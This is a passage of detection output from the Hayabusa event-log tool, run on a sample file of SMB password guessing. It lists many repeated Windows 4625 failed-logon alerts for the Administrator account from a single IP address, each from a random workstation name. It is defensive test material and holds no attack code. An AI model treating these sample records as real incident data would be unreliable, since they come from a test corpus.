NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: 